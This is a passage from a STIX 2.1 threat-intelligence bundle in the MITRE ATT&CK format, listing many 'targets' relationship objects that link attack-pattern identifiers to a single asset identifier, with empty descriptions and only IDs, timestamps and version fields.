"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840044", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f6ca3fae-cc47-4606-9cea-d955835f70fd", "created": "2024-07-01T10:37:15.840051", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840053", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b88fc572-3eeb-45d6-bc8c-b1e6604d466d", "created": "2024-07-01T10:37:15.840060", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840062", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1aad76c6-af20-44ab-8a5b-59251c80362a", "created": "2024-07-01T10:37:15.840069", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840071", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9cfbf0e6-c1fd-4bd7-99ab-36ffda153cba", "created": "2024-07-01T10:37:15.840079", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840081", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bdb78bad-9f9d-4c9e-a615-510ea98471c2", "created": "2024-07-01T10:37:15.840088", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840090", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9962877f-1471-4ef8-b91e-88b6900973d7", "created": "2024-07-01T10:37:15.840097", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840099", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba54a6e7-b387-4107-a86d-5f24822d96a2", "created": "2024-07-01T10:37:15.840106", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840108", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ec6451f4-f061-42cf-bcb7-89c3f87d2586", "created": "2024-07-01T10:37:15.840115", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840117", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41925ad5-9d79-4484-ad5e-226e23d5ac9d", "created": "2024-07-01T10:37:15.840124", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840126", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f3fcf18-117f-413d-9da1-09179fc37e8f", "created": "2024-07-01T10:37:15.840133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840135", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--35cd8abf-7c00-4053-8887-3f310657c8e9", "created": "2024-07-01T10:37:15.840143", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840145", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a67e724c-46d4-4752-8450-dc75820622e9", "created": "2024-07-01T10:37:15.840186", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840193", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3dbc87ff-7c66-413e-bd09-f4d661020141", "created": "2024-07-01T10:37:15.840205", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840207", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7dd06f9-f6ed-4725-a42a-071bdc0dd466", "created": "2024-07-01T10:37:15.840239", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840241", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e54336d1-bbb3-4468-bd32-1330d06099b2", "created": "2024-07-01T10:37:15.840249", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840251", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a86de5bb-f765-4136-aa09-ae345fbf1657", "created": "2024-07-01T10:37:15.840259", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840261", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fc0b1afc-0ea1-4390-9293-1f2d1d70192e", "created": "2024-07-01T10:37:15.840269", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840271", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df6039e7-580e-4789-824b-c516a9f434ea", "created": "2024-07-01T10:37:15.840278", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840280", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b553199a-5629-4ef7-8972-7d5bef2937de", "created": "2024-07-01T10:37:15.840287", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840289", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f994ef4-5e22-4573-bfe3-950a3dc97046", "created": "2024-07-01T10:37:15.840297", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840299", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9174b474-77a0-4670-8185-91679ab91392", "created": "2024-07-01T10:37:15.840306", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840308", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6cbe00e1-d46d-47f8-a4e5-02523c8ecff9", "created": "2024-07-01T10:37:15.840315", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840317", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ebe72a8e-0edb-4292-a5e9-ff3727c7c2e5", "created": "2024-07-01T10:37:15.840325", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840327", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--914f5aa1-2a35-41f5-8a51-c1ec99812f81", "created": "2024-07-01T10:37:15.840334", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840336", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a1b23168-ad7d-4567-99ed-0bfc291ccf38", "created": "2024-07-01T10:37:15.840343", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840345", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3db65f9e-5490-4ce6-beb9-3e312a76a0ff", "created": "2024-07-01T10:37:15.840353", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840354", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6ae90b42-a1e5-4a2b-a8f6-bf2e1ea5dc9c", "created": "2024-07-01T10:37:15.840362", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840364", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7e802dd8-2d52-4409-abf1-b08e2fa95e2c", "created": "2024-07-01T10:37:15.840371", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840373", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d218fe69-7fcc-4eb3-93fe-c33a223521e3", "created": "2024-07-01T10:37:15.840380", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840382", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74e08ace-a8f1-4750-ac35-a6bfb158ee66", "created": "2024-07-01T10:37:15.840390", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840392", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef13d7b4-87ae-4ff7-8bfe-748a07a0491f", "created": "2024-07-01T10:37:15.840399", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840401", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e8be7602-5625-49ea-a332-108e3a47ea38", "created": "2024-07-01T10:37:15.840408", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840410", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4500f99f-cb53-43db-8775-0c75ae820cd7", "created": "2024-07-01T10:37:15.840418", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840420", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1a41e4ee-a84b-40fa-999e-871a40d1879f", "created": "2024-07-01T10:37:15.840427", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840429", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--42fde9b8-1c4f-45a5-b613-fd600c4ad520", "created": "2024-07-01T10:37:15.840437", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840438", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8130e6fd-9d60-4caf-b72e-a6178c827371", "created": "2024-07-01T10:37:15.840446", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840448", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1ac7b082-cefb-4f07-bb95-08cab4afcd72", "created": "2024-07-01T10:37:15.840455", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840457", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2568f44-ca79-4785-b319-c9e9d6a7eb79", "created": "2024-07-01T10:37:15.840464", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840466", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1c9ae5f2-bb31-484c-a297-e0f3f3eb9b28", "created": "2024-07-01T10:37:15.840474", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840476", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d73b9bbc-9272-43d8-b6c8-d4a57e71edfe", "created": "2024-07-01T10:37:15.840483", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840485", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd201576-2bbb-4406-be42-d47d6cb435de", "created": "2024-07-01T10:37:15.840492", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], 